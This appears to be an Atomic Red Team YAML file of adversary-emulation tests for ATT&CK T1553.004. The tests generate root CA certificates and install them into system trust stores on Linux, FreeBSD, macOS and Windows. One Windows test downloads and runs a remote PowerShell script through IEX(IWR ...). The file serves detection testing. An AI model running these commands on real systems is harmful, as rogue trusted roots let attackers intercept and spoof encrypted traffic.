adam/atomic-red-team-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
62a85c12b51a6d903a8357cb91b555ff1b203fd3
atomic-red-team-gs/atomics/T1553.004/T1553.004.yaml
T
Hare Sudhan 62a85c12b5 FreeBSD changes (#2585) 
* freebsd changes

* renaming freebsd to linux
2023-11-06 17:41:43 -05:00

196 lines
7.8 KiB
YAML
Raw Blame History

attack_technique: T1553.004
display_name: 'Subvert Trust Controls: Install Root Certificate'
atomic_tests:
- name: Install root CA on CentOS/RHEL
auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e
description: |
Creates a root CA with openssl
supported_platforms:
- linux
input_arguments:
cert_filename:
description: Path of the CA certificate we create
type: path
default: rootCA.crt
key_filename:
description: Key we create that is used to create the CA certificate
type: path
default: rootCA.key
executor:
command: |
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
cp #{cert_filename} /etc/pki/ca-trust/source/anchors/
update-ca-trust
cleanup_command: |
rm /etc/pki/ca-trust/source/anchors/#{cert_filename}
update-ca-trust
name: sh
elevation_required: true
- name: Install root CA on FreeBSD
auto_generated_guid: f4568003-1438-44ab-a234-b3252ea7e7a3
description: |
Creates a root CA with openssl
supported_platforms:
- linux
input_arguments:
cert_filename:
description: Path of the CA certificate we create
type: path
default: rootCA.crt
key_filename:
description: Key we create that is used to create the CA certificate
type: path
default: rootCA.key
executor:
command: |
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
cp #{cert_filename} /usr/local/share/certs/
certctl rehash
cleanup_command: |
rm /usr/local/share/certs/#{cert_filename}
certctl rehash
name: sh
elevation_required: true
- name: Install root CA on Debian/Ubuntu
auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff
description: |
Creates a root CA with openssl
supported_platforms:
- linux
input_arguments:
cert_filename:
description: CA file name
type: path
default: rootCA.crt
key_filename:
description: Key we create that is used to create the CA certificate
type: path
default: rootCA.key
dependency_executor_name: sh
dependencies:
- description: |
Verify the certificate exists. It generates if not on disk.
prereq_command: |
if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
executor:
command: |
mv #{cert_filename} /usr/local/share/ca-certificates
echo sudo update-ca-certificates
name: sh
elevation_required: true
- name: Install root CA on macOS
auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49
description: |
Creates a root CA with openssl
supported_platforms:
- macos
input_arguments:
cert_filename:
description: CA file name
type: path
default: rootCA.crt
key_filename:
description: Key we create that is used to create the CA certificate
type: path
default: rootCA.key
dependency_executor_name: sh
dependencies:
- description: |
Verify the certificate exists. It generates if not on disk.
prereq_command: |
if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
executor:
command: |
sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
name: sh
elevation_required: true
- name: Install root CA on Windows
auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
description: |
Creates a root CA with Powershell
supported_platforms:
- windows
input_arguments:
pfx_path:
description: Path of the certificate
type: path
default: rootCA.cer
dependency_executor_name: powershell
dependencies:
- description: |
Verify the certificate exists. It generates if not on disk.
prereq_command: |
if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
get_prereq_command: |
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
executor:
command: |
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
Move-Item -Path $cert.PSPath -Destination "Cert:\LocalMachine\Root"
cleanup_command: |
try {
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
}
catch { }
name: powershell
elevation_required: true
- name: Install root CA on Windows with certutil
auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f
description: |
Creates a root CA with certutil
supported_platforms:
- windows
input_arguments:
pfx_path:
description: Path of the certificate
type: path
default: $env:Temp\rootCA2.cer
dependency_executor_name: powershell
dependencies:
- description: |
Certificate must exist at specified location (#{pfx_path})
prereq_command: |
if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
get_prereq_command: |
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
executor:
command: |
certutil -addstore my #{pfx_path}
cleanup_command: |
try {
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
} catch { }
name: powershell
elevation_required: true
- name: Add Root Certificate to CurrentUser Certificate Store
auto_generated_guid: ca20a3f1-42b5-4e21-ad3f-1049199ec2e0
description: |
The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
supported_platforms:
- windows
executor:
command: |
IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing)
cleanup_command: |
Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item
name: powershell
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink